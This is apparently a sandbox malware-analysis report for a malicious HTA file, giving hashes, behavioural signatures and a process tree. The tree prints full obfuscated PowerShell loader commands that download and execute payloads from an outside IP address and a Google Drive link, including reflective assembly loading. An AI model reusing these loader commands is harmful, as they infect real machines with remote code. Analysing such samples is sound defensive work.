Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-11-2024 05:50
Static task
static1
Behavioral task
behavioral1
Sample
d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90.hta
Resource
win10v2004-20241007-en
General
-
Target
d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90.hta
-
Size
205KB
-
MD5
d50fd6f65b574b2c9ca393cbd44ecf11
-
SHA1
1f2126c711c25c4104cf34d42316db0cf8b50d89
-
SHA256
d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90
-
SHA512
c91cf64044091d7bef8c05e19e28b0c1403960d0944d96e4f68da241b36bfac1689aae6d07356721853a732ee919abe5d1686baf6625f58d5802110e390b20d8
-
SSDEEP
96:43F97tMfPVMXbfrrFAQGFYIO7QpOMPMKtbMxQ:43F1tiV2VAQTt8NNcQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2572 PowErSHell.Exe 6 1872 powershell.exe 8 1872 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1872 powershell.exe 2508 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2572 PowErSHell.Exe 2416 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowErSHell.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2572 PowErSHell.Exe 2416 powershell.exe 2572 PowErSHell.Exe 2572 PowErSHell.Exe 2508 powershell.exe 1872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2572 PowErSHell.Exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 1872 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2136 wrote to memory of 2572 2136 mshta.exe 30 PID 2136 wrote to memory of 2572 2136 mshta.exe 30 PID 2136 wrote to memory of 2572 2136 mshta.exe 30 PID 2136 wrote to memory of 2572 2136 mshta.exe 30 PID 2572 wrote to memory of 2416 2572 PowErSHell.Exe 32 PID 2572 wrote to memory of 2416 2572 PowErSHell.Exe 32 PID 2572 wrote to memory of 2416 2572 PowErSHell.Exe 32 PID 2572 wrote to memory of 2416 2572 PowErSHell.Exe 32 PID 2572 wrote to memory of 2180 2572 PowErSHell.Exe 33 PID 2572 wrote to memory of 2180 2572 PowErSHell.Exe 33 PID 2572 wrote to memory of 2180 2572 PowErSHell.Exe 33 PID 2572 wrote to memory of 2180 2572 PowErSHell.Exe 33 PID 2180 wrote to memory of 2836 2180 csc.exe 34 PID 2180 wrote to memory of 2836 2180 csc.exe 34 PID 2180 wrote to memory of 2836 2180 csc.exe 34 PID 2180 wrote to memory of 2836 2180 csc.exe 34 PID 2572 wrote to memory of 2660 2572 PowErSHell.Exe 37 PID 2572 wrote to memory of 2660 2572 PowErSHell.Exe 37 PID 2572 wrote to memory of 2660 2572 PowErSHell.Exe 37 PID 2572 wrote to memory of 2660 2572 PowErSHell.Exe 37 PID 2660 wrote to memory of 2508 2660 WScript.exe 38 PID 2660 wrote to memory of 2508 2660 WScript.exe 38 PID 2660 wrote to memory of 2508 2660 WScript.exe 38 PID 2660 wrote to memory of 2508 2660 WScript.exe 38 PID 2508 wrote to memory of 1872 2508 powershell.exe 40 PID 2508 wrote to memory of 1872 2508 powershell.exe 40 PID 2508 wrote to memory of 1872 2508 powershell.exe 40 PID 2508 wrote to memory of 1872 2508 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe"C:\Windows\sysTem32\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe" "POWErSheLl.exe -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE ; IEx($(IeX('[sYstEM.TEXT.ENCoDInG]'+[chAr]0x3A+[CHar]0x3a+'Utf8.gETSTriNG([SystEM.ConvERT]'+[chAr]58+[ChaR]58+'fROmBAsE64sTRiNg('+[CHar]34+'JHpiejRLVXlZczhPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFZmlOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGdnUFl2VVgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERSVixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPUEMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6enFhc29aYnUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1PdEZ0dW1mTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkemJ6NEtVeVlzOE86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc1LjEzMC4zNi8xMjAvcGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmdmb3IudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nnb29kaWRlYXBsYW5uaW5nLnZicyIsMCwwKTtTVGFSVC1zTEVFcCgzKTtTVEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmcudmJzIg=='+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avxma7mi.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE9F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBE9E.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatthingsgoodideaplanning.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdFdC1WQVJJYUJsRSAnKk1EUionKS5uQW1FWzMsMTEsMl0tam9pTicnKSgoKCdZaHhpbWFnZVVybCA9IHNpRWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcicrJ3Q9ZG93bmxvJysnYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHNpRTtZaHh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1loeGltYWdlQnl0ZXMgPSBZaHh3ZWJDbGllbnQuRG93bmxvYWREYXRhKFloeGltYWdlVXJsKTtZaHhpbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jb2RpJysnbicrJ2ddOjpVVEY4LkdldFN0cmluZyhZaHhpbWFnZUJ5dGVzKTtZaHhzdGFydEZsYWcgPSBzaUUnKyc8PEJBU0U2NF9TVEFSVD4+c2lFO1loeGVuZEZsYWcgPSBzaUU8PEJBU0U2NF9FTkQ+PnNpJysnRTtZaHhzdGFydEluZGV4ID0gWWh4aW1hZ2VUZXh0LkluZGV4T2YoWWh4c3RhcnRGbCcrJ2FnKTtZaHhlbmRJbmRleCcrJyA9IFloeGltYWdlVGUnKyd4dC5JbmRlJysneE9mKFloeGVuZEZsYScrJ2cpO1knKydoeHN0JysnYXJ0SW5kZXggLWdlIDAgLWFuZCBZaHhlbmRJbmRleCAtZ3QnKycgWWh4c3RhcnRJbmRleDtZaHhzdGFydEluZGV4ICs9IFloeHN0YXJ0RmxhZy5MZW5ndGg7WWh4YmFzZTY0TGVuZ3RoID0gWWgnKyd4ZW5kSW5kZXggLSBZaHhzdGFydEluZGV4JysnO1loeGJhc2U2NENvbW1hbmQgPSBZaHhpbWFnJysnZVRleHQuU3Vic3RyaW5nKFloeCcrJ3N0YXJ0SW5kZXgsIFloeGJhcycrJ2U2NExlbmd0aCk7WWh4YmEnKydzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWWh4YicrJ2FzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIFFSeiBGJysnbycrJ3JFYWNoLU9iamVjdCB7IFloeF8gfSlbLTEuLi0oWWh4YmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtZaHhjb21tYW5kQnl0ZXMgPSBbJysnU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFloeGJhc2U2NFJldmVyc2VkKTtZaHhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoWWh4Y29tbWFuZEJ5dGVzKTtZaHh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2UnKyd0TWV0aG9kKHNpRVZBSXNpRSk7WWh4dmFpJysnTWV0aG9kLkludm9rZShZaHhudWxsLCBAKHMnKydpRXQnKyd4JysndC5ERk5OUkQvMDIxJysnLzYzLjAzMS41NzEuNzAxLy86cHR0aHNpRSwgc2lFJysnZGVzYXRpJysndmFkb3NpRSwgc2lFZGVzYXRpdmFkb3NpRSwgc2knKydFZGVzYXRpdmFkb3NpRSwgc2lFQ2FzUG9scycrJ2lFLCBzaUVkZXNhdGl2YWRvc2lFLCBzaUVkZXNhdGl2YWRvc2lFLHNpRWRlc2F0aXZhZG9zaUUsc2lFZGVzYXRpdmFkb3NpRSxzaUVkZXNhdGl2YWRvc2lFLHNpRWRlc2F0aXZhZG9zJysnaUUsc2lFZGVzYXRpdmFkb3NpRSxzaUUxc2lFLHNpRWRlc2F0aXZhZG9zaUUpKTsnKSAgLXJlUExhQ0UgIChbQ0hBUl0xMTUrW0NIQVJdMTA1K1tDSEFSXTY5KSxbQ0hBUl0zOSAgLWNyRXBMQWNlJ1loeCcsW0NIQVJdMzYgLWNyRXBMQWNlIChbQ0hBUl04MStbQ0hBUl04MitbQ0hBUl0xMjIpLFtDSEFSXTEyNCkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((gEt-VARIaBlE '*MDR*').nAmE[3,11,2]-joiN'')((('YhximageUrl = siEhttps://drive.google.com/uc?expor'+'t=downlo'+'ad&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur siE;YhxwebClient = New-Object System.Net.WebClient;YhximageBytes = YhxwebClient.DownloadData(YhximageUrl);YhximageText = [S'+'ystem.Text.Encodi'+'n'+'g]::UTF8.GetString(YhximageBytes);YhxstartFlag = siE'+'<<BASE64_START>>siE;YhxendFlag = siE<<BASE64_END>>si'+'E;YhxstartIndex = YhximageText.IndexOf(YhxstartFl'+'ag);YhxendIndex'+' = YhximageTe'+'xt.Inde'+'xOf(YhxendFla'+'g);Y'+'hxst'+'artIndex -ge 0 -and YhxendIndex -gt'+' YhxstartIndex;YhxstartIndex += YhxstartFlag.Length;Yhxbase64Length = Yh'+'xendIndex - YhxstartIndex'+';Yhxbase64Command = Yhximag'+'eText.Substring(Yhx'+'startIndex, Yhxbas'+'e64Length);Yhxba'+'se64Reversed = -join (Yhxb'+'ase64Command.ToCharArray()'+' QRz F'+'o'+'rEach-Object { Yhx_ })[-1..-(Yhxbase64Co'+'mmand.Length)];YhxcommandBytes = ['+'System.Convert]::FromBase64String(Yhxbase64Reversed);YhxloadedAssembly = [System.Reflection.Assembly]::Load(YhxcommandBytes);YhxvaiMethod = [dnlib.IO.Home].Ge'+'tMethod(siEVAIsiE);Yhxvai'+'Method.Invoke(Yhxnull, @(s'+'iEt'+'x'+'t.DFNNRD/021'+'/63.031.571.701//:ptthsiE, siE'+'desati'+'vadosiE, siEdesativadosiE, si'+'EdesativadosiE, siECasPols'+'iE, siEdesativadosiE, siEdesativadosiE,siEdesativadosiE,siEdesativadosiE,siEdesativadosiE,siEdesativados'+'iE,siEdesativadosiE,siE1siE,siEdesativadosiE));') -rePLaCE ([CHAR]115+[CHAR]105+[CHAR]69),[CHAR]39 -crEpLAce'Yhx',[CHAR]36 -crEpLAce ([CHAR]81+[CHAR]82+[CHAR]122),[CHAR]124) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f3cc4500c4982922ee58e67f6eb05701
SHA147165ef84c4f132923b98071a99fd75bb960ee9d
SHA2562384ac6d1710e521054f97686e2399a8a15e839cb21cc0b8883a8d97fdd8bea8
SHA512216cc3ea7876458be97e78f7037f47bfad7ce7b6368082f324c57a900ecf0b0a38e772e45068efb612eac45019fdf9976e45cbf993466c310be741291a2fe422
-
Filesize
3KB
MD545cf09dc96b9a4bb7304b6ba88643d18
SHA144792a110c0308f4c3684dc0e91dd44a772f5ee0
SHA256e7f854dacce73b746feba347951e31375d79df9d99c554641f50110d22e11989
SHA512437369104bdf0fd684daefec216d7bafe3fe8e394e0039fb377117a8a447dc0bff0144820747ceb73c4201e0315d8f6fbc92ff1f1a4f84e39d6b62ba8b5c858a
-
Filesize
7KB
MD5624f3efdda847a6207cff3f8fee47a18
SHA1c885ff87284f27bbf817606d0f896dc7de057ffb
SHA256f02497caf796abf09fa9cf73a39184b6d12f1b06c779e17956e102f648b24a34
SHA512709e5ded0c15de5f33e8078746e03446358b36f14e544beb0da445a2c0ca39c2ece14e18bb2dd53c8ba373ad4269d37fc4672909a4e06c56e5adac3e54a25ac7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6QEK0X0FFM3PG28DS2K0.temp
Filesize7KB
MD5017d7e37c03c16ddb131865f5059ede3
SHA1793231185a6a3b06164c2cd6c73d9d623b83cfe0
SHA25644ebe57135423b4c06080e9cf10e40b02f435a4d9a102d1035e8ca7b21d4b15d
SHA51260334bec29a0709d50132da44761d1e78ada2d40907b15a5f2eba929f395c676f54246114392b76aa27260e33b428e5cefc622f440751ed56fcb73a4a6813e82
-
Filesize
138KB
MD59bffefbc57020a8809b3782eb2a8f14c
SHA1487d426d1e74b0ce7cf26b11c5a828d640b36f4b
SHA256bb276fb4cfa1b0f9fbd68566672cef1f670e70691c387d6fe11d8176cb009995
SHA512a93f4d082d9255b91be0d2e5449acb845a304f3b5fefc5644052e6018dd0cde4998f80932599ad7761b758870748c47b2bbe51bfa1c82c749fab01b0d118e075
-
Filesize
652B
MD55a6b149718337de1577bdc9f4640a7df
SHA1526ac87b2ebdf7e940a811d9db9660be51aa9775
SHA2563c3285e24495b5e60bcd6883b5bb46a738426b6c80f5ec92b00efc188c64c999
SHA5128e1d4c2b70b81d139383f03721a03255404d976f4aa3988746fd0c2d202be18ff01edb5726748e088092c76e2df61fe375f0fca0d543e06940f26df85990df06
-
Filesize
469B
MD5f89c3daa6416168719346d97618dab89
SHA1291029ed13418eefcd0902435ecac1b3caeb61f2
SHA2560ae5932bfd2ff3ff3a4522cf176bc41a9062d1e981d01a73e9e8a72664423b0d
SHA5129a8ebe03128f7fbc0c5adf8d76060d7f9b1a7d4319f0cdc0af64ca80e0eba34c6c91796d1f04f044b1c1a4ec5d30a9dcf57aa662ed138f9f3f983d915216cb55
-
Filesize
309B
MD57a913fe2cf8b2767b30cae23729c9f0a
SHA1aeed548ad3fa6108493e80aea6bff3bd4f6e700d
SHA256b5bfa55f6957c43f47491837031e0b3c0bae63faf8128b7798548412ba0ca3b8
SHA5122ddec8d30275aaffda938325930be66371b30ab7c21d6dc75ef4bcfdad3f234f1de889621efffaf587b8682cd19decdb304f61ee30acafdb782a3b4a9bdc9f0f